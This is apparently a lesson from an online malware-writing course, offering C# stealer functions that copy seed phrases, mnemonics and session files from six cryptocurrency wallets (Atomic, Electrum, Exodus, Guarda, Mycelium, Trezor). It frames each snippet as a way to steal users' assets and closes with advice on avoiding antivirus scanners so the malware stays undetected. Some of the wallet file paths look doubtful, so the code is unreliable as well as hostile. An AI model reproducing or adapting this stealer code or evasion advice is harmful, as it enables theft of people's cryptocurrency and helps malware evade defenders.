Lesson 9: Stealing Offline Crypto Wallets with Malware — Top 6 Popular + Source-Codes
Follow XIT on medium & UglyCompany on Telegram for more..
Below is the Topics List for Lesson 9:
9. Offline Crypto Wallets:
⇢ Atomic
⇢ Electrum
⇢ Exodus
more… (Guarda, Mycelium, Trezor)
Cryptocurrencies are becoming increasingly popular, with a rising number of people storing their digital assets in physical crypto wallets. These wallets, however, are excellent targets for attackers looking to steal bitcoin or other coins. In this lesson, we’ll demonstrate how to add functionality that can be able to steal offline crypto wallets from popular services such as Atomic, Electrum, Exodus, and more 3 popular.
Topic 1: Atomic Wallet
Atomic Wallet is a well-known offline cryptocurrency wallet that supports over 500 different coins. Using the below source-code you can write a function that is capable of stealing Atomic Wallet passwords and gaining access to users’ crypto assets.
// atomic
// set the folder path to save session files and mnemonic phrase
string folderPath = ".";
// get the wallet path
string walletPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "atomic", "Local Storage", "leveldb");
// copy the session files to the folder path
string[] sessionFiles = Directory.GetFiles(walletPath, "LOCK*");
foreach (string file in sessionFiles)
{
File.Copy(file, Path.Combine(folderPath, Path.GetFileName(file)));
}
// get the mnemonic phrase
string mnemonicPath = Path.Combine(walletPath, "mnemonic.json");
string mnemonicJson = File.ReadAllText(mnemonicPath);
dynamic mnemonic = Newtonsoft.Json.JsonConvert.DeserializeObject(mnemonicJson);
string mnemonicPhrase = mnemonic.mnemonic;
// save the mnemonic phrase to a txt file in the folder path
File.WriteAllText(Path.Combine(folderPath, "mnemonic.txt"), mnemonicPhrase);
Topic 2: Electrum Wallet
Electrum is another well-known offline crypto wallet that has been in existence since 2011. Using the below source-code you can write a function that can steal Electrum Wallet passwords and access users’ crypto assets.
// electrum
// set the folder path to save session files and seed phrase
string folderPath = ".";
// get the wallet path
string walletPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Electrum");
// copy the session files to the folder path
string[] sessionFiles = Directory.GetFiles(walletPath, "electrum.lock");
foreach (string file in sessionFiles)
{
File.Copy(file, Path.Combine(folderPath, Path.GetFileName(file)));
}
// get the seed phrase
string seedPath = Path.Combine(walletPath, "wallet_seed");
string seedPhrase = File.ReadAllText(seedPath);
// save the seed phrase to a txt file in the folder path
File.WriteAllText(Path.Combine(folderPath, "seed.txt"), seedPhrase);
Topic 3: Exodus Wallet
Exodus is an easy-to-use offline crypto wallet that supports over 100 cryptocurrencies. Using the below source-code you can write a function that can steal Exodus Wallet credentials and give you access to users’ digital assets.
// exodus
// set the folder path to save session files and seed phrase
string folderPath = ".";
// get the wallet path
string walletPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Exodus");
// copy the session files to the folder path
string[] sessionFiles = Directory.GetFiles(walletPath, "session*");
foreach (string file in sessionFiles)
{
File.Copy(file, Path.Combine(folderPath, Path.GetFileName(file)));
}
// get the seed phrase
string seedPath = Path.Combine(walletPath, "exodus.wallet");
string seedJson = File.ReadAllText(seedPath);
dynamic seed = Newtonsoft.Json.JsonConvert.DeserializeObject(seedJson);
string seedPhrase = seed.encseed;
// save the seed phrase to a txt file in the folder path
File.WriteAllText(Path.Combine(folderPath, "seed.txt"), seedPhrase);
Topic 4: Other Crypto Wallets
There are numerous additional offline crypto wallets with significant credentials than Atomic, Electrum, and Exodus. Using the below source-codes you can write a function that can steal passwords from other popular cryptocurrency wallets, allowing you to access even more digital assets.
A) Guarda
// guarda
// set the folder path to save session files and seed phrase
string folderPath = ".";
// get the wallet path
string walletPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Guarda");
// copy the session files to the folder path
string[] sessionFiles = Directory.GetFiles(walletPath, "session*");
foreach (string file in sessionFiles)
{
File.Copy(file, Path.Combine(folderPath, Path.GetFileName(file)));
}
// get the seed phrase
string seedPath = Path.Combine(walletPath, "mnemonic.key");
string seedJson = File.ReadAllText(seedPath);
dynamic seed = Newtonsoft.Json.JsonConvert.DeserializeObject(seedJson);
string seedPhrase = seed.mnemonic_phrase;
// save the seed phrase to a txt file in the folder path
File.WriteAllText(Path.Combine(folderPath, "seed.txt"), seedPhrase);
B) Mycelium
// mycelium
// set the folder path to save session files and seed phrase
string folderPath = ".";
// get the wallet path
string walletPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.Personal), "Mycelium", "wallets");
// copy the session files to the folder path
string[] sessionFiles = Directory.GetFiles(walletPath, "session*");
foreach (string file in sessionFiles)
{
File.Copy(file, Path.Combine(folderPath, Path.GetFileName(file)));
}
// get the seed phrase
string seedPath = Path.Combine(walletPath, "keys", "masterseed");
byte[] seedBytes = File.ReadAllBytes(seedPath);
string seedPhrase = Encoding.UTF8.GetString(seedBytes);
// save the seed phrase to a txt file in the folder path
File.WriteAllText(Path.Combine(folderPath, "seed.txt"), seedPhrase);
C) Trezor
// set the folder path to save session files and seed phrase
string folderPath = ".";
// get the wallet path
string walletPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "trezor", "wallets");
// copy the session files to the folder path
string[] sessionFiles = Directory.GetFiles(walletPath, "session*");
foreach (string file in sessionFiles)
{
File.Copy(file, Path.Combine(folderPath, Path.GetFileName(file)));
}
// get the seed phrase
string seedPath = Path.Combine(walletPath, "seed.txt");
string seedPhrase = File.ReadAllText(seedPath);
// save the seed phrase to a txt file in the folder path
File.WriteAllText(Path.Combine(folderPath, "seed.txt"), seedPhrase);
Finally, I compiled all the topics of lesson 9 & it was detected by 3 out of 26 antivirus scans.
Remember: Don’t share your unencrypted assemblies or malware source to random antivirus scanners, use the only those which are listed on the article given below to keep your malware undetected forever:
Conclusion
For attackers looking to steal important digital assets, stealing offline crypto wallets is a profitable technique. This class explained how to create malware that may be used to steal login information from well-known offline cryptocurrency wallets like Atomic, Electrum, and Exodus. With this information, you may create malware programmes that are more effective and keep up with the most recent cybersecurity threats. Keep an eye out for our upcoming class when we’ll discuss creating a functions that can capture account sessions.